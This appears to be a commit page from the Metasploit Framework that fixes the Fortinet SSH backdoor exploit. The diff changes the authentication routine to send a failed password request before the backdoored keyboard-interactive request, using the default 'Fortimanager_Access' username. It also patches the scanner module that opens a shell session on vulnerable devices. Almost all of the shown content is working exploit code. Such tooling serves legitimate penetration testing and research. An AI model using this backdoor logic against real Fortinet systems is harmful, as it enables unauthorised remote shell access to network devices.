Browse Source

Finally fix "Unknown admin user ''" after 2yrs

The failed password auth was necessary after all. I misread the PoC. :'(

Apparently the password auth sets the username, while the backdoored
keyboard-interactive auth sets the password.
William Vu 1 year ago
parent
commit
3880f6a65e
2 changed files with 29 additions and 10 deletions
  1. 26
    10
      lib/msf/core/exploit/fortinet.rb
  2. 3
    0
      modules/auxiliary/scanner/ssh/fortinet_backdoor.rb

+ 26
- 10
lib/msf/core/exploit/fortinet.rb View File

@@ -1,5 +1,6 @@
1 1
 # -*- coding: binary -*-
2 2
 
3
+# https://www.ietf.org/rfc/rfc4252.txt
3 4
 # https://www.ietf.org/rfc/rfc4256.txt
4 5
 
5 6
 require 'net/ssh'
@@ -11,21 +12,21 @@ module Msf::Exploit::Remote::Fortinet
11 12
     USERAUTH_INFO_RESPONSE = 61
12 13
 
13 14
     def authenticate(service_name, username = 'Fortimanager_Access', password = nil)
14
-      debug { 'Sending SSH_MSG_USERAUTH_REQUEST' }
15
+      debug { 'Sending SSH_MSG_USERAUTH_REQUEST (password)' }
15 16
 
16 17
       send_message(userauth_request(
17 18
 =begin
18
-        string    user name (ISO-10646 UTF-8, as defined in [RFC-3629])
19
-        string    service name (US-ASCII)
20
-        string    "keyboard-interactive" (US-ASCII)
21
-        string    language tag (as defined in [RFC-3066])
22
-        string    submethods (ISO-10646 UTF-8)
19
+        string    user name
20
+        string    service name
21
+        string    "password"
22
+        boolean   FALSE
23
+        string    plaintext password in ISO-10646 UTF-8 encoding [RFC3629]
23 24
 =end
24 25
         username,
25 26
         service_name,
26
-        'keyboard-interactive',
27
-        '',
28
-        ''
27
+        'password',
28
+        false,
29
+        password || ''
29 30
       ))
30 31
 
31 32
       loop do
@@ -37,7 +38,22 @@ module Msf::Exploit::Remote::Fortinet
37 38
           return true
38 39
         when USERAUTH_FAILURE
39 40
           debug { 'Received SSH_MSG_USERAUTH_FAILURE' }
40
-          return false
41
+          debug { 'Sending SSH_MSG_USERAUTH_REQUEST (keyboard-interactive)' }
42
+
43
+          send_message(userauth_request(
44
+=begin
45
+            string    user name (ISO-10646 UTF-8, as defined in [RFC-3629])
46
+            string    service name (US-ASCII)
47
+            string    "keyboard-interactive" (US-ASCII)
48
+            string    language tag (as defined in [RFC-3066])
49
+            string    submethods (ISO-10646 UTF-8)
50
+=end
51
+            username,
52
+            service_name,
53
+            'keyboard-interactive',
54
+            '',
55
+            ''
56
+          ))
41 57
         when USERAUTH_INFO_REQUEST
42 58
           debug { 'Received SSH_MSG_USERAUTH_INFO_REQUEST' }
43 59
 

+ 3
- 0
modules/auxiliary/scanner/ssh/fortinet_backdoor.rb View File

@@ -93,6 +93,9 @@ class MetasploitModule < Msf::Auxiliary
93 93
     }
94 94
 
95 95
     start_session(self, info, ds_merge, false, shell.lsock)
96
+
97
+    # XXX: Ruby segfaults if we don't remove the SSH socket
98
+    remove_socket(ssh.transport.socket)
96 99
   end
97 100
 
98 101
   def rport

Loading…
Cancel
Save